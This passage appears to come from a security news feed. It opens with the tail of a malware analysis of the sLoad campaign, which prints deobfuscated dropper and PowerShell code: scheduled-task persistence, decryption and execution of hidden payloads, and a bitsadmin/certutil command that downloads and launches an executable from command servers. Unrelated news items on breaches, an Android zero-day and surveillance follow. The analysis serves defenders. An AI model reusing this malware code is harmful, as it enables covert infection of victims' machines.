  20. For Each RIst In JFLY.Files
  21. If InStr(RIst.Name,”.pdf”) > 0 Then
  22. PavfQt.run “explorer “+JFLY+”\”+RIst.Name
  23. End if
  24. Next
  25. End If
  26. End Sub
  27. Function IsAccessible(XaiX)
  28. On Error Resume Next
  29. IsAccessible = (XaiX.SubFolders.Count >= 0)
  30. End Function

Code snippet 1: Deobfuscated vbs dropper

The malware downloads a fake jpg using the using “bitsadmin.exe”  tool from “hxxps://dreamacinc[.com/UCP9dATGyt6mJ/srdzHcN4bWUum[.jpg”. The usage of native tools allow the script to operate under the radar avoiding several AVs controls. The fake jpg actually contains a powershell script. 

  1. $oLZz2= “C:\Users\admin\AppData\Roaming”;
  2. $YwbpkcN9XUIv1w=@(1..16);
  3. […]
  4. $main_ini=’76492d1116743f0423413b16050a5345MgB8ADUAVAB4 […] AMQAyAGYA’;
  5. $main_ini | out-file $PaIQGLoo’\main.ini’;
  6. $domain_ini=’76492d1116743f0423413b1605 […] YwBlAA==’;
  7. $domain_ini | out-file $PaIQGLoo’\domain.ini’;
  8. […]
  9. try{ […]
  10. }catch{$yC0iBerAupzdtf5Z=Get-Process -name powershell*;
  11. if ($yC0iBerAupzdtf5Z.length -lt 2){
  12. $EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
  13. $r=8;
  14. $B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
  15. $zjGQzSypyGPthusR = $047MydhkAAfp1W+”\”+$B3xcDMBF;
  16. $sv8eJJhgWV3xAN7Uu=@(1..16);
  17. $umwTVcIoudRlXjR6yAQQ= Get-Content “main.ini”$MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
  18. $AKXy3OFCowsfie = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
  19. $DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
  20. Invoke-Expression $DBR4S3t;
  21. }
  22. } | out-file $PaIQGLoo’\’$H3z9RnzIihO8′.ps1′
  23. $OFHc0H4A=’ /F /create /sc minute /mo 3 /TN “S’+$rs+$fLCg9ngJqRHX36hfUr+'” /ST 07:00 /TR “wscript /E:vbscript ‘+$PaIQGLoo+’\’+$JxdRWnHC+’.tmp”‘;
  24. start-process -windowstyle hidden schtasks $OFHc0H4A; […]

Code snippet 2: Downloaded powershell code

The first action the script  does is to set a scheduled task to grant persistence on the infected machine. Then, after selection a random active process on infected machine (“System” in this specific infection) and concatenation it with the “%AppData%\Roaming” path, it stores four different files in his installation folder.

  • <random_name>.tmp
  • <random_name>.ps1
  • domain.ini
  • main.ini

All of them are embedded in the script; furthermore, two of them (“domain.ini” and “main.ini”)  are encrypted using the “ConvertFrom-SecureString”  native function. Then, the script runs the “UoqOTQrc.tmp” file, having the only purpose to execute the “UoqOTQrc.ps1” file contained in the same folder.

Figure 3: Files created in “%AppData%\Roaming\<active_process>\”
  1. Dim str, min, max
  2. Const LETTERS = “abcdefghijklmnopqrstuvwxyz”
  3. min = 1
  4. max = Len(LETTERS)
  5. Randomize
  6. […]
  7. Set objFSO=CreateObject(“Scripting.FileSystemObject”)
  8. Set winssh = WScript.CreateObject (“WScript.Shell”)
  9. fName=RandomString(10)
  10. JAcalshy=RandomString(4)
  11. fZgxNPDMnu=RandomString(4)
  12. WEHxctVdTEoDfqEqJMP=RandomString(4)
  13. […]
  14. Set objFile = objFSO.CreateTextFile(outFile,8, True)
  15. objFile.Write “Set “+JAcalshy+”=rshe” & vbCrLf
  16. objFile.Write “Set “+fZgxNPDMnu+”=ypa” & vbCrLf
  17. objFile.Write “Set “+WEHxctVdTEoDfqEqJMP+”=il” & vbCrLf
  18. objFile.Close
  19. winssh.run “powershell -ep bypass -file .ps1”,0,true

Code snippet 3: content of “UoqOTQrc.tmp” file.

  1. try{
  2. Remove-EventLog:Debug-Job
  3. Export-BinaryMiLog:Get-PSSessionConfiguration
  4. Remove-JobTrigger:New-Item
  5. }catch{
  6. $yC0iBerAupzdtf5Z=Get-Process -name powershell*;
  7. if ($yC0iBerAupzdtf5Z.length -lt 2){
  8. $EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;$r=8;
  9. $B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
  10. $zjGQzSypyGPthusR = $047MydhkAAfp1W+”\”+$B3xcDMBF;
  11. $sv8eJJhgWV3xAN7Uu=@(1..16);
  12. $umwTVcIoudRlXjR6yAQQ= Get-Content “main.ini”
  13. $MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
  14. $AKXy3OFCowsfie =
  15. [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
  16. $DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
  17. Invoke-Expression $DBR4S3t;
  18. }

Code snippet 4: content of “UoqOTQrc.ps1” file.

In the same way, the “UoqOTQrc” script decrypts the “mini.ini” file using the “ConvertFrom-SecureString” function and the ecnryption key contained in “$sv8eJJhgWV3xAN7Uu” variable, a sequential integer array. 

Figure 4: “main.ini” file before and after decryption

The decrypted “main.ini” script tries to ping a URL generated selecting three ascii char-codes in ranges [65-90] and [67-122]. Then, it decrypts “domain.ini” using the key in the “$main_key” variable. In the end, it saves the results in the “btc.log” file. Continuing the analysis of “main.ini” is possible to spot that the script also grabs system information to check-in the newly infected host.

Figure 5: “domain.ini” file before and after decryption
Figure 6: Some information exfiltrate by the malware before and after base64 decoding

At this point, another malicious file is downloaded. The malware retrieves it from “hxxps://<C2_URL>/doc/x2401.jpg”. Once again, this is not a real jpg, but rather another obfuscated powershell layer.

  1. $u2K2MQ4 = “`r`n”
  2. $lNlNrKyk= –join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})
  3. $yIXgWSaXsKD5hanf9uO= $env:userprofile+’\App’+’Da’+’ta\Ro’+’am’+’ing’;
  4. $hh=’hi’+’dd’+’en’;
  5. $ixXApGeqJKEGY=@(1..16);
  6. $Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
  7. $Erlydj = $Erlydjiyy.UUID;
  8. $sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
  9. $Z5lTNXB = $yIXgWSaXsKD5hanf9uO+”\”+$sOmUGoc0ysV8UW;
  10. If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}
  11. If(test-path $Z5lTNXB”\_in”){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB”\_in”;$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; “1” | out-file $Z5lTNXB”\_in”;
  12. try{ Remove-Item $Z5lTNXB’\*’}catch{}
  13. $wsxDITPgQCH+=’76492d1116743f0423413b16050a5345MgB8AGsAKwBwAHkASQBUAGgAWgBKAEsAbgBFAE8AUQBHA’;
  14. […]
  15. $wsxDITPgQCH+=’UAZAA1AGIAZAA0ADIAYgBkAGUANQAzADIAYgBkAGIAMwBlADMAZQA1ADAAOQA3ADgAYwAyAGYAMgA’;
  16. $wsxDITPgQCH+=’3ADAANQA1AA==’;
  17. $wsxDITPgQCH | out-file $Z5lTNXB’\config.ini’;
  18. $5r8DcJB4ok4+=’76492d1116743f0423413b16050a5345MgB8AHQAYgBqAFYAVQBQADUAQwBNAGEAZABWAFMA’;
  19. […]
  20. $5r8DcJB4ok4+=’YQBiADUAOAAzAGQANAAxADgAMwAxAGYANQAwAGIA’;
  21. $5r8DcJB4ok4 | out-file $Z5lTNXB’\web.ini’;
  22. start-process -windowstyle $hh schtasks ‘/change /tn GoFast /disable’;
  23. $2aWxu9dutZfOPCCgS+=$u2K2MQ4+’Dim ‘;
  24. […]
  25. $nz0oninX6=$ixXApGeqJKEGY -join ‘,’;
  26. $E6M6Np8nhXnu4ndPEJ=’ /F /create /sc minute /mo 3 /TN “U’+$sOmUGoc0ysV8UW+'” /ST 07:00 /TR “wscript /E:vbscript ‘+$Z5lTNXB+’\’+$lNlNrKyk+’.tmp”‘;
  27. start-process -windowstyle $hh schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 5: Obfuscated content of “x2401.jpg” file.

  1. $u2K2MQ4 = “rn”;
  2. $lNlNrKyk= –join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_});
  3. $yIXgWSaXsKD5hanf9uO= $env:userprofile+’\AppData\Roaming’;
  4. $Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
  5. $Erlydj = $Erlydjiyy.UUID;
  6. $sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
  7. $Z5lTNXB = $yIXgWSaXsKD5hanf9uO+”\”+$sOmUGoc0ysV8UW;
  8. If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}
  9. If(test-path $Z5lTNXB”\_in”){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB”\_in”;$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; “1” | out-file $Z5lTNXB”\_in”;
  10. try{ Remove-Item $Z5lTNXB’\*’}catch{}
  11. $wsxDITPgQCH=”76492d1 […] A1AA==”;
  12. $wsxDITPgQCH | out-file $Z5lTNXB’\config.ini’;
  13. $5r8DcJB4ok4=”7649 […] AGIA”;
  14. $5r8DcJB4ok4 | out-file $Z5lTNXB’\web.ini’;
  15. start-process -windowstyle hidden schtasks ‘/change /tn GoFast /disable’;
  16. $2aWxu9dutZfOPCCgS=”Dim winssh […] winssh.run “powershell -ep bypass -file vJjFwtSM.ps1″,0,true”;
  17. $2aWxu9dutZfOPCCgS | out-file $Z5lTNXB’\’$lNlNrKyk’.tmp’
  18. $r1uIiPZBhUea0=” $zTxePJtpmbVI0btT6cd9=Get-Process -name powershell*; […] Invoke-Expression $NLO3lwvn1xWn;}”;
  19. $r1uIiPZBhUea0 | out-file $Z5lTNXB’\’$lNlNrKyk’.ps1′
  20. $nz0oninX6=”1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16″;
  21. $E6M6Np8nhXnu4ndPEJ=”/F /create /sc minute /mo 3 /TN “U52A34D” /ST 07:00 /TR “wscript /E:vbscript C:\Users\admin\AppData\Roaming\52A34D\vJjFwtSM.tmp”;
  22. start-process -windowstyle hidden schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 6: Deobfuscated content of “x2401.jpg” file.

Like previous script, this one perform the same operations and create other four file in “%AppData%\Roaming\<active_process>” path. This time the files are:

Figure 7: Files created in “%AppData%\Roaming\<active_process>\”
  • <random_name>.tmp
  • <random_name>.ps1
  • config.ini
  • web.ini

The first executed file is “<random_name>.tmp”. It is not obfuscated and its only purpose is the execution of “<random_name>.ps1”. The content of “<random_name>.ps1” file is the following. The latest script decrypt the content of “config.ini” file. The following figure shown both encrypted and decrypted “config.ini” file.

Figure 8: Files created in “%AppData%\Roaming\<active_process>\”

This script performs the same operation described in “main.ini” file but use different URLs stored in the “web.ini” file. Also this time, the file is decrypted using an integer array from 1 to 16  as key and contained in “$mainKey” variable.

Figure 9: “web.ini” file before and after decryption

Finally, it tries to download the final payload with the following piece of script. However, at the time of analysis, all the C2 URLs seems to be down, so we are not able to detect the final payload family. 

  1. $dPath = [Environment]::GetFolderPath(“MyDocuments”)
  2. $jerry=$starsLord+’\’+$roccon+’_’+$rp;
  3. $clpsr=’/C bitsadmin /transfer ‘+$rp+’ /download /priority FOREGROUND ‘+$line+’ ‘+$jerry+’.txt & Copy /Z ‘+$jerry+’.txt ‘+$jerry+’_1.txt & certutil -decode ‘+$jerry+’_1.txt ‘+$dPath+’\’+$roccon+’_’+$rp+’.exe & powershell -command “start-process ‘+$dPath+’\’+$roccon+’_’+$rp+’.exe” & exit’;
  4. start-process -wiNdowStylE HiddeN $mainDMC $clpsr;
  5. $clpsr=’/C del ‘+$jerry+’.txt & del ‘+$jerry+’_1.txt & del ‘+$dPath+’\’+$roccon+’_’+$rp+’.exe & exit’;
  6. start-process -wiNdowStylE HiddeN $mainDMC $clpsr;

Code snippet 7: script to download the final payload

Comparison With Previous Chains

To better understand the evolution of sLoad infection chain, we compared attack attempts observed since 2018 and the latest ones. In both cases, the infection vector is a carefully themed malicious email, weaponized with zip archive containing two files. In the first case the starting point is a “.lnk” file and in the second one the chain starts with a “.vbs” script. 

The sLoad attack chain observed months ago was characterized by some pieces of powershell code appended to the tail of the zip archive. Probably, this technique become more detectable during the time, so it could have been deprecated in latest infections attempts. For both malware variants, the archive contains a legit image (or pdf) used to deceive the unaware user. Moreover, in the first analyzed variant, the core of the infection is mainly based on powershell scripts and LOLbins. However, the latest stages uses a mix of Powershell and Visual Basic Scripts.


Figure 10: Infection chain workflow

The agent body is still quite similar in the core structure, however the bot now supports new commands such as “Exec” and “Eval”, the latter is able to download further code through the Bitsadmin utility instead of directly rely on “Net.WebClient” primitive. Also, the “ScreenCapture” function have been removed from the new version of the code, in favor to the enhancement of the agent persistence through scheduled task.

Figure 11: Comparison between old and new version on “config.ini” file

Conclusion

sLoad is keeping evolving their TTPs and represents a vivid threat for the Italian cyber-panorama. Also, many times, especially during the last months, its activities in the country involved the abuse of certified mailboxes (PEC) targeting associated professionals and consultants, along with private companies. Additionally, the quality of the latest phishing emails is high: the group adopted templates and naming conventions actually in use by  Italian Revenue Agency (“Agenzia delle Entrate”).

The plentiful usage of LOLbins, Powershell scripts and SSL encrypted channels, makes detection of this threat difficult for automated systems, and frequently requires analysis abilities or high quality threat intelligence sources to detect and tackle sLoad attack campaigns, many times targeting just a single country.

Experts published a post on the Yoroi blog:

https://blog.yoroi.company/research/the-sload-threat-ten-months-later/

Pierluigi Paganini

(SecurityAffairs – sLoad, malware)

The post The sLoad Threat: Ten Months Later appeared first on Security Affairs.

Payment Card Security Incidents Disclosed by Three U.S. Restaurant Chains

Three restaurant chains based in the United States have revealed they suffered security incidents that affected customers’ payment card information. On October 2, three subsidiaries of Focus Brands–Moe’s Southwest Grill, McAlister’s Deli and Schlotzsky’s–published near-identical copies of a security incident notice. These statements revealed that the restaurants had nearly finished investigating security incidents of which […]… Read More

The post Payment Card Security Incidents Disclosed by Three U.S. Restaurant Chains appeared first on The State of Security.

This Week in Security News: How a GIF Can Hack Your Android and Vulnerabilities That Could Put Hospital Networks at Risk

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how smart home devices can be easily hacked and 11 vulnerabilities that could affect medical devices and hospital networks. Also, read about why AI could be vital to your security future and a massive Zynga breach affecting more than 200 million players.

Read on:

In Identity Theft the Target is You!

The hard truth is that identity data is the new gold—and criminal panhandlers are constantly mining for the sale and distribution of data on the Dark Web. But what can we as digital citizens do to protect ourselves? Trend Micro’s recent blog post describes how to keep yourself and your data safe.

Trend Micro Named a Leader in Endpoint Security

Trend Micro was cited as a leader with the second-highest score in the current offering category in The Forrester Wave: Endpoint Security Suites, Q3 2019 report. Trend received the highest possible score for Corporate Vision and Focus (a criterion under the Strategy category), a recognition of stable leadership, innovative technology and high-quality product management and development.

New Fileless Botnet Novter Distributed by KovCoreG Malvertising Campaign

Trend Micro found a new modular fileless botnet malware called Novter that the KovCoreG campaign has been distributing since March. KovCoreG is known for using the Kovter botnet malware through malvertisements and exploit kits to commit click fraud.

Trend Micro: Why AI Could Be Vital to Your Security Future

With businesses of all sizes keen to ensure they don’t become the next big-name security attack victim, the need to stay on top of your data could be central to staying safe from the latest threats. Cybercrime tactics have become more professional and business-like in recent years, keeping them one step ahead of the game.

Hacker Compromised Family’s Wi-Fi, Taunted Family with Thermostat, Camera for 24 Hours

According to a recent report, a hacker was able to hack into a couple’s Nest security system, control their thermostat and talk to them via their camera. According to the report, changing their Wi-Fi password wasn’t enough to keep the hacker away and disturbances only stopped after changing the network ID. Read up on how to protect your smart home and IoT devices in Trend Micro’s analysis.

Securing the Industrial Internet of Things: Addressing IIoT Risks in Healthcare

The industrial internet of things (IIoT) has rapidly transformed the network and data infrastructure in health and medicine. However, rapid adoption of IIoT is not without risks. Healthcare stakeholders must first understand the dangers it brings to the field when haphazardly implemented. Read more about addressing IIoT risks in healthcare in Trend Micro’s blog.

This Huge Android Trojan Malware Campaign Was Discovered After the Gang Behind It Made Basic Security Mistakes

A giant botnet and banking trojan malware operation has infected hundreds of thousands of Android users since at least 2016 – but mistakes by the group have revealed details of the campaign and how they operate.

Permanent Jailbreak on iPhones Possible Using Checkm8 Unpatchable Exploit

Security researcher axi0mX discovered “checkm8,” an exploit that could allow the jailbreak of millions of iOS devices. The exploit lies in the bootrom of the affected devices, which in turn is located on a read-only memory chip. This renders the exploit unpatchable and the resulting jailbreak permanent.

Exim Vulnerability CVE-2019-16928 Could Lead to Denial-of-Service and Remote Code Execution Attacks

A vulnerability involving the message transfer agent Exim — estimated to run roughly 57% of all email servers — has been discovered by security researchers from QAX-A-Team. Exploitation of the bug, assigned CVE-2019-16928, could result in threat actors being able to launch denial-of-service (DoS) or remote code execution (RCE) attacks.

Zynga Data Breach Exposed 200 Million Words with Friends Players

Publisher Zynga announced there was a data breach of account login info for Draw Something and Words with Friends players on Sept. 12.  A hacker that goes by the name of Gnosticplayers said they stole data from over 218 million Words with Friends player accounts.

FDA Warns Against URGENT/11 Vulnerabilities Affecting Medical Devices and Hospital Networks

The Food and Drug Administration (FDA) notified patients, healthcare professionals, and other stakeholders, warning them of a set of 11 vulnerabilities that could put medical devices and hospital networks at risk. The set of vulnerabilities was dubbed “URGENT/11,” and was discovered in a decade-old third-party software component called IPnet.

Who Should the CISO Report To, and Other CloudSec 2019 Takeaways

The second annual CloudSec event hosted by Trend Micro last week yielded valuable insight from industry leaders both on stage and during breakout sessions. Trend’s Mark Nunnikhoven, vice president of cloud research, discusses Canada’s position in the cloud adoption race.

Security 101: Zero-Day Vulnerabilities and Exploits

A zero-day attack exploits an unpatched vulnerability and could significantly affect organizations using vulnerable systems. Trend Micro provides an overview detailing what businesses need to know about zero-day vulnerabilities so they can better mitigate the risks and the threats that exploit them.

Were you aware that smart home devices could be hacked? Will it affect your decision to buy smart home devices in the future? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

 

The post This Week in Security News: How a GIF Can Hack Your Android and Vulnerabilities That Could Put Hospital Networks at Risk appeared first on .

#VB2019: Cyber Threat Alliance Cites Vendor Collaboration Benefits

#VB2019: Cyber Threat Alliance Cites Vendor Collaboration Benefits

Speaking at the Virus Bulletin 2019 conference in London, members of the Cyber Threat Alliance discussed the benefits of sharing intelligence.

Led by moderator and Cyber Threat Alliance COO Heather King, panelists Kathi Whitbey, program manager of cyber threat intelligence information Sharing at Palo Alto Networks and Jeannette Jarvis, director product marketing at Fortinet, said that there are clear benefits to sharing data, as Jarvis explained: “There is the opportunity to expand and share more deeper intelligence.” 

Jarvis said that there is an intention with the Alliance to “build equal or better ecosystems beyond what our adversaries are doing, and to know what they are sharing” and this can better protect customers with “actionable intelligence.”

Whitbey added that the founding members believed in the “power of collaboration and sharing.” Asked by King how the Cyber Threat Alliance is unique, Jarvis admitted that all of the members have different missions, but the collaborative nature means that companies can get enough data to get the complete picture of an issue.

Pointing at the WannaCry incident in 2017, Whitbey said that within hours they knew what each other was seeing and what the issue was, and “we were able to paint a picture as everyone provided what they had and we could see all the information in real time.”

Jarvis admitted that “no one has all the information” and by sharing they get the complete picture and fill in the gaps. 

The panellists explained that the members don’t have the same technology, customers or are in the same regions, “but if we collaborate we all get into the environment,” Whitbey said.

Jarvis reflected on a previous role at an aerospace company, saying that it was clear from working in that role “that we need to be more connected to help customers.”

Loans by phone: Revolutionizing Digital Loan Applications

One of the greatest challenges for any business organization is finding the right balance between secure technology and an engaging, timely customer experience. For financial institutions, in particular, it’s a struggle to satisfy customers’ demands for digital innovation without compromising compliance and security. “It’s important to realize that it’s not a trade-off,” says Sam Bakken,…

Cyber News Rundown: Data Dash

Reading Time: ~ 2 min.

DoorDash Data Breach

Nearly five months after a breach, DoorDash has just now discovered that unauthorized access to sensitive customer information has taken place. Among the stolen data were customer names, payment history, and contact info, as well as the last four digits of both customer payment cards and employee bank accounts. The compromised data spans nearly 5 million unique customers and employees of the delivery service. DoorDash has since recommended all users change their passwords immediately.

American Express Employee Fraud

At least one American Express employee was fired after it was revealed they had illicitly gained access to customer payment card data and may have been using it to commit fraud at other financial institutions. Following this incident, American Express began contacting affected customers offering credit monitoring services to prevent misuse of their data.

Hackers Target Airbus Suppliers

Several suppliers for Airbus have recently been under cyber-attack by state-sponsored hackers that seem to have a focus on the company’s VPN connections to Airbus. Both Rolls-Royce and Expleo, European manufacturers of engines and technology respectively, have been targeted for their technical documentation by Chinese aircraft competitors. This type of attack has pushed many officials to urge for higher security standards across all supply chains, as both large and small companies are now being attacked.

Ransomware Law Passes Senate

A recently passed law mandates the Department of Homeland Security support organizations affected by ransomware. While focused on protecting students in New York state, the legislation follows 50 school districts across the U.S. falling victim to ransomware attacks in 2019 alone, compromising up to 500 schools overall. A similar bill recently passed in the House of Representatives, which is expected to be combined with this legislation.

Ransomware Targets Hospitals Around the Globe

Multiple hospitals in the U.S. and Australia have fallen victim to ransomware attacks within the last month. Some sites were so affected that they were forced to permanently close their facilities after they weren’t able to rebuild patient records from encrypted backups. Several offices in Australia have been unable to accept new patients with only minimal systems for continuing operations.

The post Cyber News Rundown: Data Dash appeared first on Webroot Blog.

Project Zero researcher found unpatched Android zero-day likely exploited by NSO group

Google Project Zero researcher Maddie Stone discovered a critical unpatched zero-day vulnerability affecting the Android mobile operating system.

Maddie Stone, a member of the Google elite team Project Zero, discovered a critical unpatched zero-day vulnerability affecting the Android mobile operating system. According to the expert, the bug, tracked as CVE-2019-2215, was allegedly being used or sold by the controversial surveillance firm NSO Group.

Maddie Stone published technical details and a proof-of-concept exploit for the high-severity security vulnerability, seven days after she reported it to the colleagues of the Android security team.

The flaw is a use-after-free vulnerability that affects the Android kernel’s binder driver, it could be exploited by a local privileged attacker or a malicious app to escalate privileges to gain root access to a vulnerable device. Experts warn it could potentially allow to fully compromise the device.

“There is a use-after-free of the wait member in the binder_thread struct in the binder driver at /drivers/android/binder.c.” reads the security advisory.

“As described in the upstream commit: “binder_poll() passes the thread->wait waitqueue that can be slept on for work. When a thread that uses
epoll explicitly exits using BINDER_THREAD_EXIT, the waitqueue is freed, but it is never removed from the corresponding epoll data structure. When
the process subsequently exits, the epoll cleanup code tries to access the waitlist, which results in a use-after-free.”

The flaw affects versions of Android kernel released before April last year. This vulnerability was addressed in Dec 2017 in the 4.14 LTS kernel [1], AOSP android 3.18 kernel [2], AOSP android 4.4 kernel [3], and AOSP android 4.9 kernel [4]. The expert pointed out that Pixel 2 with most recent security bulletin is still vulnerable based on source code review.

This means that most of the Android devices available on the market with the unpatched kernel are still vulnerable to this vulnerability, even is the owners have installed the latest Android security updates.

Some of the devices which appear to be vulnerable based on source code review are:

1) Pixel 2 with Android 9 and Android 10 preview (https://android.googlesource.com/kernel/msm/+/refs/heads/android-msm-wahoo-4.4-q-preview-6/)
2) Huawei P20
3) Xiaomi Redmi 5A
4) Xiaomi Redmi Note 5
5) Xiaomi A1
6) A3
7) Moto Z3
8) Oreo LG phones (run according to )
9) Samsung S7, S8, S9

Maddie Stone explained that the flaw is accessible from inside the Chrome sandbox, the issue is exploitable in Chrome’s renderer processes under Android’s ‘isolated_app’ SELinux domain. This means that a remote attacker could potentially exploit the flaw by chaining it with a Chrome rendering issue.

“The bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If the exploit is delivered via the web, it only needs to be paired with a renderer exploit, as this vulnerability is accessible through the sandbox.” Stone said.

“I’ve attached a local exploit proof-of-concept to demonstrate how this bug can be used to gain arbitrary kernel read/write when run locally. It only requires untrusted app code execution to exploit CVE-2019-2215.”

Google is expected to release a security patch for its October’s Android Security Bulletin.

“This issue is rated as High severity on Android and by itself requires installation of a malicious application for potential exploitation. Any other vectors, such as via web browser, require chaining with an additional exploit,” concludes the Chromium blog. “We have notified Android partners, and the patch is available on the Android Common Kernel. Pixel 3 and 3a devices are not vulnerable while Pixel 1 and 2 devices will be receiving updates for this issue as part of the October update.”

Pierluigi Paganini

(SecurityAffairs – Google, zero-day)

The post Project Zero researcher found unpatched Android zero-day likely exploited by NSO group appeared first on Security Affairs.

#VB2019: Endpoints Remain Vulnerable to WannaCry Two Years On

#VB2019: Endpoints Remain Vulnerable to WannaCry Two Years On

Despite the main infections taking place two and half years ago, a large number of computers remain vulnerable to the WannaCry ransomware.

Speaking to Infosecurity at the Virus Bulletin 2019 conference in London, Sophos security researcher Chet Wisniewski said that there are large numbers of businesses who did not apply the patches, released in March and after the infection in May 2017, so machines still remain vulnerable. “That’s what surprised me, with the amount of hype and the amount of news around that vulnerability, it shows that even standing on the rooftop and lighting your hair on fire is not going to be enough for people to take action,” he said.

“The good news is that there is an accidental vaccination which means that the good people won’t get infected with it,” he said. He explained that a version of WannaCry drops a payload, but that payload is currently corrupted and if another infection is attempted, if that file is detected at all, the infection will not take place.

“Fortunately, all of these copies of WannaCry we’re seeing are neutered,” he added. “It’s not hurting anyone, it’s just spreading around and making a lot of noise.”

Wisniewski went on to say that people are still not realizing that “these weaponized exploits are really dangerous, and BlueKeep has been an interesting trial of this.” In that case, he said that wormable exploits are typically published within hours, but in the case of BlueKeep that has only been added to Metasploit and other companies are using it as a penetration testing tool.

“If people have not patched since 2017, if a BlueKeep publicly exploitable worm was released, instantly millions of machines would be impacted again, and we would be in the same boat as when WannaCry was spreading around,” he said. “Every single one of those machines would be vulnerable as they have not been patched in two years, not to mention all of those that have been patched since.”

Attacks on UK Businesses Soar 243%

Attacks on UK Businesses Soar 243%

Cyber-attacks on UK businesses surged by a whopping 243% over the summer, compared to the same period last year, according to new findings from Beaming.

The Hastings-based business ISP analyzed data from the thousands of organizations across the UK that it supplies.

It found that UK firms experienced 157,528 attacks each on average between July and September, up from 45,970 during the same three months of 2018.

The firm detected nearly 500,000 unique IP addresses used to launch cyber-attacks on UK businesses during the period, with the number originating from China more than doubling over last year. A large number of attacks also originated in Taiwan, Brazil and Russia, Beaming said.

The most frequently targeted systems were Internet of Things (IoT) devices and file sharing services, accounting for 20% and 6% of attacks respectively.

FireEye warned in June of a “dramatic” increase in abuse of file sharing services such as WeTransfer, Dropbox, Google Drive and OneDrive, which are used to host malicious and phishing files in email-borne attacks.

What’s more, cyber-criminals are increasingly gearing up to exploit unprotected IoT devices, according to a Trend Micro report released last month. The firm analyzed chatter on dark web forums across the globe and found routers and IP cameras were the most commonly discussed devices.

Businesses face a threat on two fronts: they could be DDoS-ed or attacked in other ways from botnets of compromised IoT machines like these; or their own operational technology could be hijacked and sabotaged, disrupting key business and manufacturing processes.

“Previous summers have been relatively quiet when it comes to cybercrime, but the hackers haven’t yet taken a break this year. Throughout 2019 we have witnessed new highs in the volume of cyber-attacks hitting organisations in the UK and also the number of active agents behind those attempts,” said Beaming managing director, Sonia Blizzard.

“We are tackling more and more malicious code at a network level to minimize the threat of online attacks to our customers. The hackers are after the weakest link they can find, so companies need to boost their resilience to these sustained, indiscriminate attacks. They can do this by ensuring their software and cybersecurity defenses are up-to-date, putting in place measures such as managed firewalls and educating employees to help them avoid the main risks they could be exposed to.”

Unpatched Android flaw exploited by attackers, impacts Pixel, Samsung, Xiaomi devices

A privilege escalation vulnerability affecting phones running Android 8.x and later is being leveraged by attackers in the wild, Google has revealed. Interestingly enough, the flaw was patched in late 2017 in v4.14 of the Linux kernel and in Android versions 3.18, 4.4, and 4.9, but the fix was apparently never propagated to later Android versions. Who’s affected? Maddie Stone, a Senior Security Engineer on the Android Security team at Google, revealed that a number … More

The post Unpatched Android flaw exploited by attackers, impacts Pixel, Samsung, Xiaomi devices appeared first on Help Net Security.

Weekly Update 159

Weekly Update 159

Well, this will be the last weekly update done overseas for some time as I count down the return to beaches, sunshine and fantastic coffee (yes, I'm confident saying that even whilst in Italy!) It's been a non-stop trip with an attempt of a bit of downtime at the end of it, albeit with limited success. Regardless, this week I'm covering off the last few days travels, reflecting on 10 years of blogging and looking at a really cool use of HIBP related to net neutrality comments lodged at the FCC. Next week... who knows, but at least I'll be home.

Weekly Update 159
Weekly Update 159
Weekly Update 159

References

  1. I went to CERN - it was amazing! (that's a bunch of thoughts and pics from the trip, just staggeringly cool stuff IMHO)
  2. I started a little blog 10 years ago, you'll never believe what happened next... (but seriously, everything I do professionally today started from that one post)
  3. Personal data from a breach was used to spam the FCC (a fascinating look at how HIBP was used to help get to the bottom of it)
  4. Sponsored by Kolide, a User Focused Security app for teams that care about the trust and privacy of their users. Start your free 30 day trial now!

Egypt regularly spies on opponents and activists with mobile apps

Researchers at Check Point discovered that Egypt ‘ government has been spying citizens in a sophisticated surveillance program

Researchers at Check Point discovered that the Egyptian government has been spying on activists and opponents as part of a sophisticated surveillance program.

The list of victims is long and includes journalists, politicians, activists and lawyers.

The expert started their investigation after Amnesty International published a report in March that provided details on targeted attacks against journalists and human rights activists in Egypt.

The Egyptian government conducted most of the spying activities using mobile apps, some of which are also delivered via Google Play.

Check Point has identified tens of victims that were tricked into download the malicious apps that offered useful services.

